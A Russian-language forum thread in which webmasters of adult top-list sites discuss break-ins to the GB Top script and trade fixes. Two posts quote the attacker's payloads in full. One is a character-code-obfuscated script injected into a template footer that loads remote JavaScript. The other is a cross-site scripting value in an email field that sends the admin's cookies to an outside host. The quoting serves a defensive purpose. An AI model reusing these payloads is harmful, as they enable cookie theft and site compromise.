На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
 Добавлено: 14/10/10 в 23:10 |
Тут такая хрень вышла присылают мне письмо, что мол один маленький засранец из твоих трейдеров засунул тебе в темплейт вирус, ну думаю посмотрю и твою же мать реально нашел в футере не пойми откуда появившийся скрипт!
| Код: [развернуть] |
<script>var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!104!116!116!112!58!47!47!98!101!115!116!120!120!120!46!111!114!103!47!105!109!97!103!101!115!47!115!46!106!115!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);</script>
|
Потом начал догадыватся. Один контом все пытался засабмитить то 2.com то 21.com и в таком же порядке все остальное, но вместо мыла вбивал какуюто херь наподобии css что ли кода, даже не заапрувленый акк корежил админку, после удаления все было норм опять. Походу баг в ГБ топе. Мля хз че делать... Пипл в блек лист ip 94.143.197.2
Последний раз редактировалось: CrazyMen (20/12/10 в 21:23), всего редактировалось 1 раз
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 14/10/10 в 23:22 |
Опять сученыш добавился!
Данные такие теперь:
domain: hoto.com
Webmaster Email: | Код: [развернуть] | | aa@mail.com\" id=thread_title_716 style=position:absolute;top:90px;left:0px;z-index:999;width:1000;height:50;display:block onmouseover=eval(String.fromCharCode(118,97,114,32,111,117,114,95,116,101,120,116,61,34,60,105,102,114,97,109,101,32,115,114,99,61,92,34,106,97,118,97,115,99,114,105,112,116,58,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,92,39,104,116,116,112,58,47,47,105,105,46,115,101,120,45,116,111,112,46,111,114,103,47,105,109,103,47,105,109,103,46,112,104,112,63,92,39,43,112,97,114,101,110,116,46,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,92,34,32,115,116,121,108,101,61,92,34,100,105,115,112,108,97,121,58,110,111,110,101,59,92,34,62,60,47,105,102,114,97,109,101,62,34,59,10,118,97,114,32,101,108,101,109,101,110,116,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,49,34,41,59,10,101,108,101,109,101,110,116,46,105,110,110,101,114,72,84,77,76,43,61,111,117,114,95,116,101,120,116,59)) \\ |
Webmaster IP: 94.143.197.2 Mozilla/5.0 (Windows
Последний раз редактировалось: CrazyMen (16/10/10 в 11:18), всего редактировалось 1 раз
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 19.04.05
Сообщения: 1577
Рейтинг: 957
|
| Добавлено: 15/10/10 в 07:50 |
CrazyMen какая версия скрипта?
Написал о проблеме на - GB Top Forum
goldenbull - выпустит заплатку или обновит версию для скачки.
Последний раз редактировалось: Retox (15/10/10 в 16:56), всего редактировалось 1 раз
|
|
|
|
Link Trade - блоги в Art,Comics,Hentai,3D и тп - 338198557
|
6
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 15/10/10 в 08:40 |
Поставь на все хтмл файлы в templates разрешение 644
А то что административную часть пробивают, это к разработчику. Хотя мне вроде тоже добавляли подобные сайты, но админка не ломалась. Браузер Опера.
|
|
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 15/10/10 в 10:03 |
Меня тоже атаковал этот гад...
|
|
|
|
| |
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
| Добавлено: 15/10/10 в 11:03 |
Мне тоже досталось, причем дважды, ломанули админки топов, штук 12, сменили пароли, в футер или хедер прописали скрипт, причем еще и разный (фантазеры бля), выплывала консоль при любом нажатии по морде топа или при его закрытии. Почистил все. Права 777 на все папки топа ставить нельзя, шаблоны надо защитить ставя права ниже чем 777, можно файл админки admin.php заменить на другой (на что фантазия способна). Столько времени похерено из долбаеба хакера
Его следы
1stsexmovies@hotmail.be
124.106.185.183 Mozilla/5.0
124.106.143.48
124.217.19.243
|
|
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 15/10/10 в 16:01 |
Аналогично добавлялся этот чурка, только так и не понял как самбит его смог пропустить если он не указывал мейл, и после него когда заходил в админку его емейл появлялся в верху стр. и сама по себе перезагружалась пока его не удалил!
gimcnuk ставить на templates разрешение 644 - это что то изменит? 
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 15/10/10 в 19:03 |
Версия топа 5.1. Если поставить права 644 на темплейты то невозможно будет их редактировать из админки что в общем то и не нужно
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 23.08.10
Сообщения: 461
Рейтинг: 342
|
| Добавлено: 15/10/10 в 23:41 |
Блять, а нельзя этот мега код как-то уменьшить? В тег какой-нить завернуть, типа [ code ]. Вся верстка похерилась.
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 16/10/10 в 11:17 |
Adrenalin: Дак БЛЯТЬ,а он в чем? Прям беда что верстка похерилась!
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 25.09.03
Сообщения: 3833
Рейтинг: 1767
|
| Добавлено: 19/10/10 в 17:58 |
ко мне тоже этот пидарас добавлялся
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 19/10/10 в 20:16 |
Разговаривал с автором - Goldenbullом - сказал что все пофиксил и реализовал в версии 5.3. Обновляйтесь обязательно.
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 23/10/10 в 16:28 |
... вот и неделя не прошла, как у меня все топы и фришники в этом злое****м скрипте, правда сейчас в верху страницы появилися код, и не кто ко мне не подозрительный не самбителся, а на некоторых топах вообще самбита не было! Хотя до этого обновил все топы версией 5.2 думал что не критично будет обновлять до 5.3. И самое интересное что на фришниках которые на скрипте гб сж, этот код как бы сам по себе появляется. Все топы обновил и вставаил часть злого кода в блек лист, как говорит автор скрипта! На некоторых топах постваил права 644 на штмл фаилы в папке темплейтс для эксперемента! Вообще лучше переходить на другой скрипт с хорошим античитом и не ломаемым ;)
|
|
|
|
| |
С нами с 19.04.05
Сообщения: 1577
Рейтинг: 957
|
| Добавлено: 23/10/10 в 16:45 |
Дольчик ххх - GB хороший скрипт - как вариант конечно DF Pro ну или на движке СЖ делай...
рано или поздно к любому движку хакеры находят ключик... Тот же вордпресс для блогов его как не обновляй всё равно уязвимость будет.
-Возможно руткит засел на сервере который инжектит сплоитную компоненту в файлы с правами на запись... Потомучто во фришники то как мог попасть исключая увод ФТП...
Ну и права на файлы должны помочь...
Хотя ситуация очень неприятная 
|
|
|
|
Link Trade - блоги в Art,Comics,Hentai,3D и тп - 338198557
|
6
|
|
| |
I love suicidegirls.com ;-)
С нами с 27.10.04
Сообщения: 7060
Рейтинг: 2819
|
| Добавлено: 23/10/10 в 17:58 |
Оффтопик: Может автор гб скрипта решил подзаработать ? 
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 24/10/10 в 10:42 |
Дольчик ххх: Думаю не стоит менять скрипт это рутинная работа, благо обновления выходят. Действително проверь свой фтп напряги админов.
_4eburek: Да врядли конечно, но все возможно 
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 30/10/10 в 20:12 |
Теперь этот гадёных сломал мою сетку:
http://new-tops.com/webmasters.html
Хрен знает как.
В ящике 438 писем "Mail delivery failed: returning message to sender"...
Пипец полный...
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 30/10/10 в 20:34 |
Может техподдержка чего намудрила?
Если .htaccess есть, посмотри что в нём:
| Код: | | AddType application/x-httpd-php .??? |
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 30/10/10 в 20:34 |
Да мен,шняга шняжная получается. Что нибудь в темплейты добавили? Весрия какая была скрипта? Отпиши обязательно на офф форуме. Мне еще кажется что голденбул продавать скрипт будет другому.
ВАЖНО!
В НАСТРОЙКАХ ПОСТАВЬТЕ МИНИМАЛЬНЫЙ ВЕС ДОБАВЛЯЕМОГО САЙТА "1000"! ТАК Н ЕСМОГУТ ДОБАВИТЬ ПУСТЫЕ/НЕСУЩЕСТВУЮЩИЕ ДОМЕНЫ!
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 30/10/10 в 20:58 |
.htaccess нету...
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 30/10/10 в 21:02 |
Ну я смотрю починилось всё. Спроси поддержку - чего они мудрили с расширениями.
|
|
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 30/10/10 в 21:16 |
Фу-ух...
Было так. Заглядываю в мыло. Там опять этот педераст добавил в мои три топа зловредную хрень, как описано в первом посте.
Ну, я пошёл его удалять, но в админку зайти не смог. Глядь, а все топы уже не работают. Захожу в мыло, а там тонны мусора, но тех писем, что хранились до того - нету...
|
|
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 30/10/10 в 21:40 |
Опять всё пропало... 
|
|
|
|
| |
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
| Добавлено: 30/10/10 в 22:44 |
Постучался к хостеру.
Вроде, починили...
Хрен, опять сломалось...
Последний раз редактировалось: Danyil (30/10/10 в 23:16), всего редактировалось 1 раз
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 30/10/10 в 23:14 |
Ставь 5.3! Я же писал что вышло обновление пофиксенный спешл фо эту дыру. На все что в папке темплейт поставь права 644, после редактирования. Стучись админам у тебя реально походу хтаццесс поехал. Хотя один топ живой у тебя. Попробовал добавить нашару придуманый сайт и без проблем добавил сморти под титлом Ya BOT. Обновись, времени займет минут 30 от силы.
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
|
Спонсор раздела
|
